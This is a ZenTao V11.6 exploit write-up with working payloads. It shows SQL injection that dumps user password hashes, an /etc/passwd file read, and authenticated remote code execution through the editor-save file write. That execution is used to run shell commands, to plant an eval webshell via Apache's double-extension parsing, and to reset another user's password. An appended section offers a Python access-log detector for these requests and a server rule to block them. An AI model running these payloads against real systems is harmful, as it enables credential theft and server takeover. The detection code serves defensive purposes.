Test environment: V11.6
#SQL injection
http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user
{"status":"success","data":"[{\"account\":\"admin\",\"password\":\"e64b78fc3bc91bcbc7dc232ba8ec59e0\"}]","md5":"c574c2dcc413d3f52b5fc6356ecae1fb"}
#Arbitrary file read
http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd
As an aside, if the target is ZenTao itself, the \xampp\tmp
directory caches a lot of very sensitive serialized data; it is worth keeping an eye on.
#RCE
Requires at least ordinary-user privileges.
Linux
- POC:
#request
POST /zentao/api-getModel-editor-save-filePath=/tmp/123 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=vqruohhgn7qbhveakg04h9e267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
fileContent=<?php phpinfo()?>
#response
HTTP/1.1 200 OK
Date: Wed, 10 Jun 2020 10:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: lang=zh-cn; expires=Fri, 10-Jul-2020 10:16:53 GMT; Max-Age=2592000; path=/zentao/
Set-Cookie: device=desktop; expires=Fri, 10-Jul-2020 10:16:53 GMT; Max-Age=2592000; path=/zentao/
Set-Cookie: theme=default; expires=Fri, 10-Jul-2020 10:16:53 GMT; Max-Age=2592000; path=/zentao/
Vary: Accept-Encoding
Content-Length: 72
Connection: close
Content-Type: text/html; Language=UTF-8;charset=UTF-8
{"status":"fail","data":"null","md5":"37a6259cc0c1dae299a7866489dff0bd"}
http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1
- RCE:
fileContent=<?php system('whoami');?>
- One-line webshell:
fileContent=<?php file_put_contents('/opt/zbox/app/zentao/www/xxx.php.aaa', '<?php @eval($_REQUEST["x"]);?>');?>
http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1
http://127.0.0.1/zentao/xxx.php.aaa?x=phpinfo();
For reference, here is the usage that does not work:
fileContent=<?php file_put_contents('/opt/zbox/app/zentao/www/xxx.php', '<?php @eval($_REQUEST["x"]);?>');?>
The difference is obvious: because of the framework's routing restrictions, PHP does not parse it; here the Apache parsing vulnerability is used to bypass that.
- Reset another user's password:
fileContent=<?php file_put_contents('/opt/zbox/app/zentao/tmp/reset_5ee19b1707968.txt', '');?>
Windows
POST /zentao/api-getModel-editor-save-filePath=11111 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=j06qtsnjdifluem52d7789g540
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
fileContent=<?php phpinfo()?>
http://172.19.1.1:88/zentao/api-getModel-api-getMethod-filePath=11111/1
What is the difference from Linux? Here you can see that the path is not an absolute path as it is on Linux. Testing showed that on Linux, when the file is written directly, it could not be found anywhere on the disk with find, whereas on Windows the absolute path is hard to adjust: using a relative path writes straight into the \xampp\zentao\module\api
directory, and the absolute path can be obtained via RCE with fileContent=<?php getcwd()?>
For other operations, refer to the Linux section.
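The following is an added detection example, not part of the original write-up or of ZenTao itself. It scans Apache combined-format access-log lines for the two request shapes shown above: calls to the api-getModel route (which exposes arbitrary module methods, with the module/method pairs used in this write-up flagged as high severity, any other pair as medium) and requests for files with a double extension such as xxx.php.aaa, which Apache's mod_mime multi-extension handling can pass to PHP. The log format, the list of risky method pairs and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache combined-log lines (not real traffic); they mirror
# the requests shown in the write-up plus two benign requests.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jun/2020:18:16:53 +0800] "GET /zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user HTTP/1.1" 200 152 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jun/2020:18:17:01 +0800] "GET /zentao/api-getModel-file-parseCSV-fileName=/etc/passwd HTTP/1.1" 200 980 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jun/2020:18:17:10 +0800] "POST /zentao/api-getModel-editor-save-filePath=/tmp/123 HTTP/1.1" 200 72 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jun/2020:18:17:15 +0800] "GET /zentao/api-getModel-api-getMethod-filePath=/tmp/123/1 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jun/2020:18:17:20 +0800] "GET /zentao/xxx.php.aaa?x=phpinfo(); HTTP/1.1" 200 51230 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jun/2020:18:18:00 +0800] "GET /zentao/my/ HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jun/2020:18:18:05 +0800] "GET /zentao/theme/default/images/main/logo.png HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Apache "combined" log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# ZenTao routes the call as /zentao/api-getModel-<module>-<method>-<params>,
# as seen in the write-up's URLs.
API_GETMODEL_RE = re.compile(
    r'api-getModel-(?P<module>[A-Za-z0-9_]+)-(?P<method>[A-Za-z0-9_]+)(?:-(?P<params>.*))?$'
)

# Module/method pairs the write-up shows being abused (assumed list; extend as needed).
HIGH_RISK_METHODS = {
    ("api", "sql"),        # raw SQL execution
    ("file", "parseCSV"),  # arbitrary file read
    ("editor", "save"),    # arbitrary file write
    ("api", "getMethod"),  # includes the written file
}

# Request for a file named *.php.<something>: the Apache multi-extension pattern.
DOUBLE_EXT_RE = re.compile(r'\.php\.[^/]+$', re.IGNORECASE)


def parse_params(raw):
    """Turn 'a=1&b=2'-style parameters into a dict, decoding '+' and %xx."""
    params = {}
    for part in raw.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def analyse_target(target):
    """Return a finding dict for one request target, or None if it looks benign."""
    path, _, query = target.partition("?")
    match = API_GETMODEL_RE.search(path)
    if match:
        pair = (match.group("module"), match.group("method"))
        return {
            "kind": "api-getModel",
            "module": pair[0],
            "method": pair[1],
            "params": parse_params(match.group("params") or ""),
            "severity": "high" if pair in HIGH_RISK_METHODS else "medium",
        }
    if DOUBLE_EXT_RE.search(path):
        return {
            "kind": "double-extension-php",
            "path": path,
            "params": parse_params(query),
            "severity": "high",
        }
    return None


def scan_log(text):
    """Scan Apache combined-log text and return the list of findings, in log order."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        finding = analyse_target(match.group("target"))
        if finding:
            finding.update(ip=match.group("ip"), ts=match.group("ts"),
                           verb=match.group("verb"), status=int(match.group("status")))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["kind"],
              f.get("module", f.get("path")), f.get("method", ""), f["params"])
```

Run against the sample, the five attack lines are reported and the two benign ones are not. On the mitigation side, a request for xxx.php.aaa only reaches PHP when Apache is configured to treat any file carrying a .php extension segment as PHP; denying such names at the web-server level (for example a FilesMatch rule over the same `\.php\.` pattern) closes that path independently of the application.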